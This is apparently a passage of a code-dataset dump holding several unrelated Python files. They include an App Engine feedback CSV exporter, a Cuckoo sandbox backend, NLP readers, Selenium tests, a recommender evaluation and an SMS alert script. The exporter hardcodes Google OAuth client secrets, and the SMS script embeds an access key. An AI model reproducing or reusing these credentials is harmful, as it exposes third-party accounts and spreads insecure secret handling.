OAuth2Decorator\nfrom models import RoleEntity\n\n# decorator = OAuth2Decorator(client_id='823696479254-mm9arog20nd675a176cvn2h7tnerom19.apps.googleusercontent.com',\n# client_secret='lSvqusP2vp0P-0-e98p8QnNy',\n# scope=['https://www.googleapis.com/auth/plus.profiles.read','https://www.googleapis.com/auth/userinfo.email'], approval_prompt='force')\nclass UnicodeWriter:\n\t\"\"\"\n\tA CSV writer which will write rows to CSV file \"f\",\n\twhich is encoded in the given encoding.\n\t\"\"\"\n\n\tdef __init__(self, f, dialect=csv.excel, encoding=\"utf-8\", **kwds):\n\t\t# Redirect output to a queue\n\t\tself.queue = cStringIO.StringIO()\n\t\tself.writer = csv.writer(self.queue, dialect=dialect, **kwds)\n\t\tself.stream = f\n\t\tself.encoder = codecs.getincrementalencoder(encoding)()\n\n\tdef writerow(self, row):\n\t\tself.writer.writerow([s.encode(\"utf-8\") for s in row])\n\t\t# Fetch UTF-8 output from the queue ...\n\t\tdata = self.queue.getvalue()\n\t\tdata = data.decode(\"utf-8\")\n\t\t# ... and reencode it into the target encoding\n\t\tdata = self.encoder.encode(data)\n\t\t# write to the target stream\n\t\tself.stream.write(data)\n\t\t# empty queue\n\t\tself.queue.truncate(0)\n\n\tdef writerows(self, rows):\n\t\tfor row in rows:\n\t\t\tself.writerow(row)\n\ndecorator = OAuth2Decorator(client_id='547523974349-oalhr2lmk5fjrlrvqs52dq3uivq659bq.apps.googleusercontent.com',\n client_secret='R_JVA4UDD2DZu1XoY3S9o4P-',\n scope=['https://www.googleapis.com/auth/plus.profiles.read','https://www.googleapis.com/auth/userinfo.email'], approval_prompt='force')\n\n\nclass FeedbacksExportHandler(webapp2.RequestHandler):\n\t@decorator.oauth_aware\n\tdef get(self):\n\t\tuser = users.get_current_user()\n\t\tlogging.info(user)\n\t\tuser_email = user.email()\n\t\trole = RoleEntity.get_by_id('admin')\n\t\tmembers = role.members\n\t\tif not members:\n\t\t\tmembers = []\n\t\tif user_email not in members:\n\t\t\tlogging.critical(\"Unauthorized request : \" + user_email)\n\t\t\tself.response.write(\"Unauthorized request\")\n\t\t\treturn\n\n\t\tself.response.headers['Content-Type'] = 'application/csv;charset=UTF-8'\n\t\tself.response.headers['Content-disposition'] = 'attachment; filename=all_feedbacks.csv' \n\t\tcsv_writer = csv.writer(self.response.out, delimiter=',', quotechar='\"', quoting=csv.QUOTE_ALL)\n\t\tu_csv_writer = UnicodeWriter(self.response.out)\n\t\tqry = FeedbackEntity.query().order(-FeedbackEntity.date_created)\n\t\tfbs = qry.fetch()\n\t\tfms = []\n\t\t# csv_writer.writerow(['id','restaurant','entrie','quantity','flavor','deliverman','overall','timestamp'])\n\t\tu_csv_writer.writerow(['id','restaurant','entrie','quantity','flavor','deliverman','overall','timestamp','comment'])\n\t\tfor fb in fbs:\n\t\t\tcreated_time = fb.date_created\n\t\t\tif created_time:\n\t\t\t\tutc_zone = tz.gettz('UTC')\n\t\t\t\tcst_zone = tz.gettz('America/Chicago')\n\t\t\t\tcreated_time = created_time.replace(tzinfo=utc_zone)\n\t\t\t\tcreated_time_cst = created_time.astimezone(cst_zone)\n\t\t\t\tcreated_time_cst = created_time_cst.strftime('%Y-%m-%d')\n\t\t\telse:\n\t\t\t\tcreated_time_cst = \"\"\n\t\t\tu_csv_writer.writerow([str(fb.key.id()),fb.restaurant or \"\",fb.entrie or \"\", fb.quantity or \"\", fb.flavor or \"\", fb.deliverman or \"\", fb.overall_rating or \"\", created_time_cst, fb.comment or \"\"])\n\n\n\n\n\napp = webapp2.WSGIApplication([\n\t('/feedbacks/export', FeedbacksExportHandler),\n\t# (decorator.callback_path, decorator.callback_handler()),\n], 
debug=True)","sub_path":"export.py","file_name":"export.py","file_ext":"py","file_size_in_byte":3627,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"163331074","text":"# Copyright (C) 2018 Hatching B.V.\n# This file is licensed under the MIT License, see also LICENSE.\n\nimport requests\n\nfrom arbiter.backends import AnalysisBackend\n\nclass Modified(AnalysisBackend):\n def configure(self, config):\n url = config['url']\n if not url.endswith('/'):\n url += '/'\n self.cuckoo_url = url\n self.options = config.get(\"options\")\n\n def submit_artifact(self, av_id, artifact, previous_task=None):\n body = {}\n if self.options:\n body[\"options\"] = self.options\n body[\"custom\"] = artifact.url\n files = {\"file\": (artifact.name, artifact.fetch())}\n req = requests.post(self.cuckoo_url + \"v1/tasks/create/file\",\n headers={\"X-Arbiter\": self.name},\n data=body, files=files)\n req.raise_for_status()\n resp = req.json()\n if \"task_ids\" not in resp:\n raise ValueError(resp)\n return {\"task_ids\": resp[\"task_ids\"]}\n\n def health_check(self):\n req = requests.get(self.cuckoo_url + \"v1/cuckoo/status\")\n req.raise_for_status()\n data = req.json()\n report = {\n \"machinestotal\": data[\"machines\"][\"total\"],\n \"machinesused\": data[\"machines\"][\"total\"] - data[\"machines\"][\"available\"],\n }\n return report\n","sub_path":"arbiter/backends/modified.py","file_name":"modified.py","file_ext":"py","file_size_in_byte":1345,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"163970062","text":"from liir.nlp.representation.Text import Text\n\n__author__ = 'quynhdo'\n\nclass Reader(object):\n def __init__(self, input_file):\n self.input_file=input_file\n\n def readAll(self):\n raise NotImplementedError(\"Subclasses should implement this!\")\n\nclass BatchReader(Reader):\n def __init__(self, batch_size, input_file):\n Reader.__init__(self,input_file)\n self.batch_size = batch_size\n self.current_position = 0\n self.current_file = 0\n\n\n\n def readAll(self):\n raise NotImplementedError(\"Subclasses should implement this!\")\n\n def next(self):\n raise NotImplementedError(\"Subclasses should implement this!\")\n\n def reset(self):\n self.current_position = 0\n self.current_file = 0\n\n\nclass SimulateReader(BatchReader):\n def __init__(self, batch_size, data, input_file=None):\n BatchReader.__init__(self,batch_size,input_file)\n\n self.data = data\n\n def readAll(self):\n return self.data\n\n\n\n\nclass Conll2009BatchReader(BatchReader):\n\n def __init__(self, batch_size, input_file, read_label=True, use_gold=False):\n BatchReader.__init__(self,batch_size,input_file)\n\n self.read_label = read_label\n self.use_gold = use_gold\n\n def next(self):\n txt = Text()\n if self.current_file >= len(self.input_file):\n return txt\n\n txt.readConll2009SentencesRange(self.input_file[self.current_file], self.current_position, self.current_position + self.batch_size,\n self.read_label, self.use_gold)\n self.current_position += len(txt)\n\n while len(txt) < self.batch_size:\n self.current_position = 0\n self.current_file +=1\n if self.current_file >= len(self.input_file):\n return txt\n s1 = len(txt)\n txt.readConll2009SentencesRange(self.input_file[self.current_file], self.current_position, self.current_position + self.batch_size - len(txt),\n self.read_label, self.use_gold)\n\n self.current_position += len(txt) - s1\n\n\n\n\n return txt\n\n def readAll(self):\n txt = Text()\n for f in 
self.input_file:\n txt.readConll2009Sentences(f)\n return txt\n\nif __name__ == \"__main__\":\n n = \"/Users/quynhdo/Desktop/ood.conll2009.pp.txt\"\n txt = Text()\n txt.readConll2009Sentences(n)\n txt.readConll2009Sentences(\"/Users/quynhdo/Desktop/eval.conll2009.pp.txt\")\n print (len(txt))\n r = Conll2009BatchReader(20,[n,\"/Users/quynhdo/Desktop/eval.conll2009.pp.txt\" ])\n num = 0\n\n txt = r.next()\n while len(txt) > 0:\n\n num += len(txt)\n txt = r.next()\n\n print (num)\n","sub_path":"liir/nlp/io/Reader.py","file_name":"Reader.py","file_ext":"py","file_size_in_byte":2718,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"}
+{"seq_id":"277767572","text":"# -*- coding: utf-8 -*-\n\nfrom component import Component\nfrom folder_create import FolderCreate\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as ec\nfrom selenium.webdriver.common.by import By\n\n\"\"\"\n Bar above the message list.\n Extra buttons appear when several messages are selected.\n\"\"\"\n\n\nclass Topbar(Component):\n BASE = '//div[@class=\"portal-menu js-shortcut\"] '\n TOPBAR_BUTTONS = BASE + '//span[contains(text(), \"{}\")]'\n\n TO_FOLDER_CONTEXT_MENU = BASE + '//div[@data-qa-id=\"folders\"]'\n FOLDER_ELEM = TO_FOLDER_CONTEXT_MENU + '//a[@title=\"{}\"]'\n NEW_DIR_ELEM = TO_FOLDER_CONTEXT_MENU + \\\n '//div[@data-qa-id=\"new-folder-btn\"]'\n\n DELETE = BASE + '//*[@data-qa-id=\"delete\"]'\n SELECT_ALL_MESSAGES_BUTTON = '//*[@data-qa-id=\"select-all\"]'\n\n def move_to_folder(self, folder_name):\n top_bar_button = 'В папку'\n\n WebDriverWait(self.driver, 30, 0.1).until(\n lambda d: d.find_element_by_xpath(\n self.TOPBAR_BUTTONS.format(top_bar_button))\n ).click()\n\n WebDriverWait(self.driver, 30, 0.1).until(\n lambda d: d.find_element_by_xpath(\n self.FOLDER_ELEM.format(folder_name))\n ).click()\n\n def move_to_new_folder(self, folder_name):\n top_bar_button = 'В папку'\n WebDriverWait(self.driver, 30, 0.1).until(\n lambda d: d.find_element_by_xpath(\n self.TOPBAR_BUTTONS.format(top_bar_button))\n ).click()\n\n WebDriverWait(self.driver, 30, 0.1).until(\n lambda d: d.find_element_by_xpath(self.NEW_DIR_ELEM)\n ).click()\n\n folder_create = FolderCreate(self.driver)\n\n folder_create.set_name(folder_name)\n folder_create.submit()\n\n def move_to_archive(self):\n top_bar_button = 'В архив'\n WebDriverWait(self.driver, 30, 0.1).until(\n lambda d: d.find_element_by_xpath(\n self.TOPBAR_BUTTONS.format(top_bar_button))\n ).click()\n\n def delete(self):\n WebDriverWait(self.driver, 30, 0.1).until(\n lambda d: d.find_element_by_xpath(self.DELETE)\n ).click()\n\n def select_all(self):\n WebDriverWait(self.driver, 30, 0.1).until(\n ec.element_to_be_clickable(\n (By.XPATH, self.SELECT_ALL_MESSAGES_BUTTON))\n ).click()\n","sub_path":"tests/components/topbar.py","file_name":"topbar.py","file_ext":"py","file_size_in_byte":2476,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"}
+{"seq_id":"15262144","text":"from TAP.Simple import *\nimport json\nimport os\nimport shutil\nimport StringIO\nimport incremental101 as inc\nfrom meta101 import derive\nfrom meta101.resource import File, Json\nexecfile(\"t/dies_ok.py\")\nexecfile(\"t/tempdir.py\")\n\nplan(21)\n\n\ntmp = tempdir()\nrepo = os.path.abspath(\"t/derive/repo\")\ntargets = os.path.join(tmp, \"resources\")\nos.environ[ \"repo101dir\"] = repo\nos.environ[\"targets101dir\"] = targets\nshutil.copytree(\"t/derive/resources\", 
targets)\n\n\ndef reset(*lines):\n inc.instream = StringIO.StringIO(\"\".join([line + \"\\n\" for line in lines]))\n inc.outstream = StringIO.StringIO()\n\ndef file_ok(dir, file, want, name):\n try:\n with open(os.path.join(dir, file)) as f:\n if type(want) is str:\n eq_ok(f.read(), want, name)\n else:\n eq_ok(json.load(f), want, name)\n except Exception as e:\n ok(False, \"{} ({}: {})\".format(name, e.__class__.__name__, e))\n\n\ndef derivelanguage(deriver, language, **kwargs):\n if language == \"Java\":\n raise ValueError(\"Blech\")\n return language\n\n\nreset()\nlives_ok(lambda: derive(suffix =\".lang\",\n dump =os.path.join(tmp, \"lang.json\"),\n callback=derivelanguage,\n getvalue=\"key\"),\n \"empty input runs ok\")\n\nfile_ok(tmp, \"lang.json\", {\"problems\" : {}}, \"...new, empty dump is created\")\n\n\nreset()\nlives_ok(lambda: derive(suffix =\".lang\",\n dump =os.path.join(tmp, \"lang.json\"),\n callback =derivelanguage,\n getvalue =\"language\",\n entirerepo=True),\n \"simple language derivation over entire repo\")\n\nfile_ok(tmp, \"lang.json\", {\"problems\" : {\"java\" : \"Blech\"}},\n \"...dump is modified with exceptions raised in callback\")\n\nfor lang in [\"perl\", \"python\"]:\n cap = lang.capitalize()\n file_ok(targets, lang + \".lang\", cap,\n \"...{} derives to {}\".format(lang, cap))\n\nfor lang in [\"java\", \"other\"]:\n ok(not os.path.exists(os.path.join(targets, lang + \".lang\")),\n \"...{} is not derived\".format(lang))\n\n\nwith open(os.path.join(targets, \"other.matches.json\"), \"w\") as f:\n json.dump([{\"metadata\" : {\"language\" : \"Other\"}}], f)\nwith open(os.path.join(targets, \"perl.matches.json\"), \"w\") as f:\n json.dump([{\"metadata\" : {\"language\" : \"Perl 5\"}}], f)\n\nreset(\"D \" + os.path.join(repo, \"java\"),\n \"D \" + os.path.join(repo, \"python\"),\n \"M \" + os.path.join(targets, \"other.matches.json\"))\n\nlives_ok(lambda: derive(suffix =\".lang\",\n dump =os.path.join(tmp, \"lang.json\"),\n callback =derivelanguage,\n getvalue =\"language\"),\n \"language derivation with diff input\")\n\nfile_ok(tmp, \"lang.json\", {\"problems\" : {}}, \"...dump is modified correctly\")\n\nfile_ok(targets, \"perl.lang\", \"Perl\", \"...file not in diff is not touched\")\nfile_ok(targets, \"other.lang\", \"Other\", \"...modified file is re-derived\")\n\nok(not os.path.exists(os.path.join(targets, \"python.lang\")),\n \"...python.lang is deleted as per diff\")\nok(not os.path.exists(os.path.join(targets, \"java.lang\")),\n \"...java.lang is still not derived\")\n\n\ndef oninit(deriver):\n deriver.dump[\"handled\"] = set(deriver.dump.get(\"handled\", []))\n\ndef ondump(deriver):\n deriver.dump[\"handled\"] = sorted(list(deriver.dump[\"handled\"]))\n\ndef getmore(deriver, resources, **kwargs):\n return {\n \"meta\" : resources[0][0][\"metadata\"],\n \"lang\" : os.path.basename(resources[1]),\n }\n\ndef derivemore(deriver, value, relative, **kwargs):\n deriver.dump[\"handled\"].add(relative)\n return (value, None if value[\"lang\"] == \"other.lang\" else value[\"lang\"])\n\n\nreset()\nlives_ok(lambda: derive(suffix =[\".lang.json\", \".more\"],\n resources =[Json(\".matches.json\"), File(\".lang\")],\n oninit =oninit,\n ondump =ondump,\n dump =os.path.join(tmp, \"more.json\"),\n getvalue =getmore,\n callback =derivemore,\n entirerepo=True),\n \"derivation with all bells and whistles\")\n\nfile_ok(tmp, \"more.json\", {\n \"handled\" : [\"other\", \"perl\"],\n \"problems\" : {},\n }, \"...dump result is correct\")\n\nfile_ok(targets, \"perl.lang.json\", 
{\n \"lang\" : \"perl.lang\",\n \"meta\" : {\"language\" : \"Perl 5\"},\n }, \"...perl.lang.json derived correctly\")\n\nfile_ok(targets, \"perl.more\", \"perl.lang\",\n \"...perl.more derived correctly\")\n\nfile_ok(targets, \"other.lang.json\", {\n \"lang\" : \"other.lang\",\n \"meta\" : {\"language\" : \"Other\"},\n }, \"...other.lang.json derived correctly\")\n\nok(not os.path.exists(os.path.join(targets, \"other.more\")),\n \"...returning None does not derive file\")\n\n\nreset(\"M \" + os.path.join(targets, \"other.lang\"))\n\nex = getexcept(lambda: derive(suffix =[\".lang.json\", \".more\"],\n resources =[Json(\".matches.json\"), File(\".lang\")],\n oninit =oninit,\n ondump =ondump,\n dump =os.path.join(tmp, \"more.json\"),\n getvalue =getmore,\n callback =lambda *args, **kwargs: \"wrong\"))\nis_ok(type(ex), SystemExit, \"wrong tuple size from callback raises SystemExit\")\n","sub_path":"101worker/libraries/meta101/t/21_derive.t.py","file_name":"21_derive.t.py","file_ext":"py","file_size_in_byte":5541,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"444453019","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport urllib2\nimport json\nimport os\nimport logging\nfrom collections import OrderedDict\n\ndcei_home = os.getenv('SPLUNK_HOME', '/opt/dcei')\nlog_file = os.path.join(\n dcei_home,\n 'etc/apps/dce_monitor/bin/scripts/alert_sms.log')\n\n\nlogging.basicConfig(\n level=logging.DEBUG,\n format='%(asctime)s - %(name)s - %(levelname)s -%(module)s: %(message)s',\n datefmt='%Y-%m-%d %H:%M:%S %p',\n filename=log_file,\n filemode=\"a\"\n)\n\n\ndef get_objs(kw, data=None, method=None):\n url = 'http://message.example.com/v1{:s}'.format(kw)\n req = urllib2.Request('{:s}'.format(url), data=data)\n req.add_header('Content-type', 'application/json;charset=utf-8')\n if method:\n req.get_method = lambda: method\n try:\n objs = json.loads(urllib2.urlopen(req).read())\n return objs\n except urllib2.URLError:\n return\n except:\n pass\n\n\ndef main():\n param_dict = globals().get('param_dict', dict())\n custom_param = dict(i.split('=')\n for i in param_dict['configuration']\n ['custom_param'].split())\n if param_dict:\n for tel in custom_param.get('TEL').split(','):\n message = param_dict['configuration']['name']\n message_detail = param_dict['result'].get('target', 'target')\n params = OrderedDict(\n [(\"zone\", custom_param.get('DC', '#')),\n (\"message\", message),\n (\"message_detail\", message_detail),\n (\"reservation\", \",请及时处理\")])\n data = json.dumps({\"accessKey\": \"2014420564\",\n \"receiver\": tel,\n \"tempId\": \"10759157\",\n \"params\": params\n })\n meta = get_objs('/sms/sendsms', data, 'POST')\n logging.info(\n '\"{} {}\" sent to {} {}'.format(\n message, message_detail, tel, meta.get(\n 'result', 'success')))\n\n\nif __name__ == '__main__':\n try:\n main()\n except Exception as e:\n logging.error(e)\n","sub_path":"work/daocloud/alert_sms.py","file_name":"alert_sms.py","file_ext":"py","file_size_in_byte":2166,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"512542504","text":"from pymongo import MongoClient\nimport numpy as np\nfrom collections import Counter, defaultdict\nfrom pyltr.metrics._metrics import check_qids, get_groups\nfrom scipy import stats\n\n# metrics are computed session-wise\n\ndef p_at_k(results,k=5):\n\n feedback = [i['feedback'] for i in results]\n\n return sum(feedback)/k\n\ndef ser_at_k(results, most_pop_dict, k=5):\n\n most_pop_k = 
sorted(most_pop_dict.keys(), key=lambda x: most_pop_dict[x], reverse=True)[0:k]\n\n feedback = []\n\n for i in results:\n\n if i['uri'] in most_pop_k:\n\n feedback.append(0)\n\n else:\n feedback.append(i['feedback'])\n\n return sum(feedback)/k\n\ndef nov_at_k(results, most_pop_dict, k=5):\n\n uris = [i['uri'] for i in results]\n\n novelties = [-np.log2(most_pop_dict[i]) for i in uris]\n\n return sum(novelties)/k\n\n# define popularity dictionary\n\ndataset = 'LibraryThing'\n\npop_dict = Counter()\n\nwith open('datasets/'+dataset+'/all.dat') as all_ratings:\n\n for line in all_ratings:\n \n line_split = line.strip('\\n').split(' ')\n\n item = line_split[1]\n\n pop_dict[item]+=1\n\n# normalization\n\ntot_pop = sum(pop_dict.values())\n\nfor item, pop in pop_dict.items():\n\n pop_dict[item] = pop/tot_pop\n\n# connect to DB\n\nmongodb_port = 27027\n\nclient = MongoClient('localhost', mongodb_port)\n\nentity2rec = client.entity2rec\n\nseed = entity2rec.seed\nfeedback = entity2rec.feedback\ndiscard = entity2rec.discard\n\n# query the DB\n\nfeedback_entity2rec = []\nfeedback_itemknn = []\n\nqids_entity2rec = []\nqids_itemknn = []\n\nfor post in feedback.find({\"algorithm\": \"entity2rec\"}):\n\n qids_entity2rec.append(post['user_id'])\n\n feedback_entity2rec.append(post)\n\nfor post in feedback.find({\"algorithm\": \"itemknn\"}):\n\n qids_itemknn.append(post['user_id'])\n\n feedback_itemknn.append(post)\n\n# get user_id - seed mapping\n\nseed_user_entity2rec = {}\nseed_user_itemknn = {}\n\nfor post in seed.find(): # every user_id - seed pair\n \n user_id = post['user_id']\n\n if user_id in qids_entity2rec:\n print('user %s has received entity2rec' %user_id)\n seed_user_entity2rec[user_id] = post['seed']\n\n elif user_id in qids_itemknn:\n print('user %s has received itemknn' %user_id)\n seed_user_itemknn[user_id] = post['seed']\n\n else:\n print('user %s has not rated recommendations' %user_id)\n continue\n \n# entity2rec scores\n\nquery_groups_entity2rec = get_groups(qids_entity2rec)\n\nnum_sessions_entity2rec = len(seed_user_entity2rec)\n\nentity2rec_scores = defaultdict(list)\n\nentity2rec_precision_by_popularity = defaultdict(list)\n\nentity2rec_serendipity_by_popularity = defaultdict(list)\n\nentity2rec_novelty_by_popularity_entity2rec = defaultdict(list)\n\nfor qid, a, b in query_groups_entity2rec: # iterate through the different sessions\n\n entity2rec_scores['precision'].append(p_at_k(feedback_entity2rec[a:b]))\n entity2rec_scores['serendipity'].append(ser_at_k(feedback_entity2rec[a:b], pop_dict))\n entity2rec_scores['novelty'].append(nov_at_k(feedback_entity2rec[a:b], pop_dict))\n\n try:\n seed = seed_user_entity2rec[qid]\n\n seed_pop = pop_dict[seed]\n\n entity2rec_precision_by_popularity[seed_pop].append(p_at_k(feedback_entity2rec[a:b]))\n\n entity2rec_serendipity_by_popularity[seed_pop].append(ser_at_k(feedback_entity2rec[a:b], pop_dict))\n\n entity2rec_novelty_by_popularity_entity2rec[seed_pop].append(nov_at_k(feedback_entity2rec[a:b], pop_dict))\n\n except KeyError:\n continue\n\nprint('entity2rec: P@5 ', np.mean(entity2rec_scores['precision']), '+-', np.std(entity2rec_scores['precision']/np.sqrt(num_sessions_entity2rec)))\nprint('entity2rec: SER@5 ', np.mean(entity2rec_scores['serendipity']), '+-', np.std(entity2rec_scores['serendipity']/np.sqrt(num_sessions_entity2rec)))\nprint('entity2rec: NOV@5 ', np.mean(entity2rec_scores['novelty']), '+-', np.std(entity2rec_scores['novelty']/np.sqrt(num_sessions_entity2rec)))\n\n# itemknn scores\n\nquery_groups_itemknn = 
get_groups(qids_itemknn)\n\nnum_sessions_itemknn = len(seed_user_itemknn)\n\nitemknn_scores = defaultdict(list)\n\nitemknn_precision_by_popularity = defaultdict(list)\n\nitemknn_serendipity_by_popularity = defaultdict(list)\n\nitemknn_novelty_by_popularity_entity2rec = defaultdict(list)\n\nfor qid, a, b in query_groups_itemknn:\n\n    itemknn_scores['precision'].append(p_at_k(feedback_itemknn[a:b]))\n    itemknn_scores['serendipity'].append(ser_at_k(feedback_itemknn[a:b], pop_dict))\n    itemknn_scores['novelty'].append(nov_at_k(feedback_itemknn[a:b], pop_dict))\n\n    try:\n        seed = seed_user_itemknn[qid]\n\n        seed_pop = pop_dict[seed]\n\n        itemknn_precision_by_popularity[seed_pop].append(p_at_k(feedback_itemknn[a:b]))\n\n        itemknn_serendipity_by_popularity[seed_pop].append(ser_at_k(feedback_itemknn[a:b], pop_dict))\n\n        itemknn_novelty_by_popularity_entity2rec[seed_pop].append(nov_at_k(feedback_itemknn[a:b], pop_dict))\n\n    except KeyError:\n        continue\n\nprint('itemknn: P@5 ', np.mean(itemknn_scores['precision']), '+-', np.std(itemknn_scores['precision'])/np.sqrt(num_sessions_itemknn))\nprint('itemknn: SER@5 ', np.mean(itemknn_scores['serendipity']), '+-', np.std(itemknn_scores['serendipity'])/np.sqrt(num_sessions_itemknn))\nprint('itemknn: NOV@5 ', np.mean(itemknn_scores['novelty']), '+-', np.std(itemknn_scores['novelty'])/np.sqrt(num_sessions_itemknn))\n\n# Welch's t-test\n\nprint('T-test precision:')\nprint(stats.ttest_ind(entity2rec_scores['precision'],itemknn_scores['precision'], equal_var=False))\n\nprint('T-test serendipity:')\nprint(stats.ttest_ind(entity2rec_scores['serendipity'],itemknn_scores['serendipity'], equal_var=False))\n\nprint('T-test novelty:')\nprint(stats.ttest_ind(entity2rec_scores['novelty'],itemknn_scores['novelty'], equal_var=False))\n\n# plot scores as a function of seed popularity\n\nwith open('plots/entity2rec_precision_by_popularity.csv', 'w') as entity2rec_precision_by_popularity_file:\n\n    for pop, precisions in entity2rec_precision_by_popularity.items():\n\n        p = np.mean(precisions)\n\n        entity2rec_precision_by_popularity_file.write(\"%.6f,%.6f\\n\" %(pop,p))\n\n\nwith open('plots/itemknn_precision_by_popularity.csv', 'w') as itemknn_precision_by_popularity_file:\n\n    for pop, precisions in itemknn_precision_by_popularity.items():\n\n        p = np.mean(precisions)\n\n        itemknn_precision_by_popularity_file.write(\"%.6f,%.6f\\n\" %(pop,p))","sub_path":"scripts/tinderbook_data_analysis.py","file_name":"tinderbook_data_analysis.py","file_ext":"py","file_size_in_byte":6411,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"}
+{"seq_id":"517904151","text":"def scan(words):\n    directions = [\"north\",\"south\",\"east\",\"west\",\"up\",\"down\",\"right\",\"left\"]\n    verbs = [\"go\",\"stop\",\"kill\",\"eat\"]\n    stop = [\"the\",\"in\",\"of\",\"from\",\"at\",\"it\"]\n    nouns = [\"door\",\"bear\",\"princess\",\"cabinet\"]\n    \n    wordlist = words.split()\n    \n    output = []\n\n    for word in wordlist:\n        if(word.lower() in directions):\n            output.append((\"direction\",word))\n        elif(word.lower() in verbs):\n            output.append((\"verb\",word))\n        elif(word.lower() in stop):\n            output.append((\"stop\",word))\n        elif(word.lower() in nouns):\n            output.append((\"noun\",word))\n        elif(word.isdigit()):\n            output.append((\"number\",int(word)))\n        else:\n            output.append((\"error\",word))\n    \n    return 
output\n","sub_path":"skeleton_ex48/ex48/lexicon.py","file_name":"lexicon.py","file_ext":"py","file_size_in_byte":785,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"227548646","text":"import types\nimport warnings\n\nimport numpy as np\nfrom scipy.stats import norm\n\nfrom util import constants as cs\n\n\nclass Parameters(types.SimpleNamespace):\n def __init__(self):\n super().__init__()\n\n def add_ndarray(self, param_nparray):\n self.param_counter = 0\n add_returns_to_tenure(self, param_nparray)\n add_search_params(self, param_nparray)\n add_occupation_chars(self, param_nparray)\n add_skill_types(self, param_nparray)\n add_hc_accumulation_rates(self, param_nparray)\n\n def asarray(self):\n listarray = []\n listarray.extend(self.returns_to_tenure)\n listarray.extend(self.search_params)\n listarray.extend(self.occupation_chars)\n listarray.extend(self.skill_types)\n listarray.extend(self.hc_accumulation_rates)\n return np.array(listarray)\n\n\ndef gen_initial_point():\n param0 = Parameters()\n lowerbounds = []\n upperbounds = []\n\n\n returns_to_tenure = np.array([.02, .02, .02])\n lowerbounds.extend([0] * 3)\n upperbounds.extend([.04] * 3)\n param0.param_counter = 0\n add_returns_to_tenure(param0, returns_to_tenure)\n\n\n search_params = np.array([.5, .4, .04,\n 1,1,1,1,1,1,1,1,1])\n lowerbounds.extend([.3, .2, 0] + [0.01] * 9)\n upperbounds.extend([.7,.6,.07] + [10] * 9)\n param0.param_counter = 0\n add_search_params(param0, search_params)\n\n\n gamma_frontier_curvature = 0.79981681\n lowerbounds.append(.5)\n upperbounds.append(2.0)\n\n g_angles = [0.84697507, 0.77712276, 0.91647835, 0.80430491,\n 0.82980593, 0.8585234, 0.89489879]\n lowerbounds.extend([.05] * 7)\n upperbounds.extend([np.pi/2 - .05] * 7)\n\n mincer_gamma = [0.09522364,\n 0.10771799, 0.14672799, 0.36515768, 0.43312207,\n 0.57878077, 0.59999937]\n lowerbounds.extend([0] * 7)\n upperbounds.extend([.6] * 7)\n param0.param_counter = 0\n occupation_chars = np.array([gamma_frontier_curvature] + g_angles + mincer_gamma)\n add_occupation_chars(param0, occupation_chars)\n\n skill_means = [1.0, 1.0]\n skill_sds = [.3, .3]\n skill_corrs = [0.0]\n skill_type_params = np.array(skill_means + skill_sds + skill_corrs)\n lowerbounds.extend([.5, .5, .05, .05, -.5])\n upperbounds.extend([1.5, 1.5, 1, 1, .5])\n param0.param_counter = 0\n add_skill_types(param0, skill_type_params)\n\n\n hc_accumulation_rates = np.array([.1, 1,\n .1, 1,\n .1, 1,\n .1, 1,\n .1, 1,\n .1, 1,\n .1, 1,\n .1, 1,\n .1, 1])\n lowerbounds.extend([0,.5] * 9)\n upperbounds.extend([.4, 1] * 9)\n param0.param_counter = 0\n add_hc_accumulation_rates(param0, hc_accumulation_rates)\n\n lowerbounds = np.array(lowerbounds, dtype=np.float64)\n upperbounds = np.array(upperbounds, dtype=np.float64)\n x0 = param0.asarray()\n\n for i in range(len(lowerbounds)):\n assert lowerbounds[i] <= x0[i] <= upperbounds[i]\n\n return lowerbounds, upperbounds, x0\n\n\ndef transform_array_to_paramstype(parameter_nparray):\n np.random.seed(126)\n parameter_paramtype = Parameters()\n parameter_paramtype.add_ndarray(parameter_nparray)\n return parameter_paramtype\n\n\ndef add_returns_to_tenure(self, param_nparray):\n i = self.param_counter\n self.beta0 = param_nparray[i]\n self.ften0 = param_nparray[i+1]\n self.oten0 = param_nparray[i+2]\n self.returns_to_tenure = [self.beta0, self.ften0, self.oten0]\n self.param_counter += len(self.returns_to_tenure)\n\ndef add_search_params(self, param_nparray):\n i = self.param_counter\n self.lambda_e = 
param_nparray[i]\n self.lambda_u = param_nparray[i+1]\n self.fire_rate = param_nparray[i+2]\n self.offer_probs = param_nparray[(i+3):(i + 3 + cs.NJOBS)]\n self.offer_probs = self.offer_probs/np.sum(self.offer_probs)\n self.search_params = [self.lambda_e, self.lambda_u, self.fire_rate] + list(self.offer_probs)\n self.param_counter += len(self.search_params)\n\ndef add_occupation_chars(self, param_nparray):\n i = self.param_counter\n gamma_frontier_curvature = param_nparray[i]\n g_angles = param_nparray[(i+1):(i+8)]\n fixed_gamma = transform_fixed_gangles_to_gammas(g_angles, gamma_frontier_curvature)\n self.fixed_gamma = fixed_gamma\n base_mincer = param_nparray[(i+8):(i+15)]\n self.mincer_gamma = generate_mincer_gammas(base_mincer)\n self.occupation_chars = [gamma_frontier_curvature] + list(g_angles) + list(base_mincer)\n self.param_counter += len(self.occupation_chars)\n\ndef generate_mincer_gammas(gammas):\n mincer_gamma = np.ones((cs.N_TRANS_DIM,\n cs.NJOBS - 2))\n mincer_gamma[0, :] = gammas\n mincer_gamma[1, :] = 1 - gammas\n mincer_gamma = np.insert(mincer_gamma, 1,\n np.array([[1.0, 0.0]]), axis=1)\n mincer_gamma = np.insert(mincer_gamma, 6,\n np.array([[0.0, 1.0]]), axis=1)\n return mincer_gamma\n\n\ndef transform_fixed_gangles_to_gammas(g_angles, gamma_frontier_curvature):\n fixed_gamma = np.zeros((2, 7))\n with warnings.catch_warnings():\n 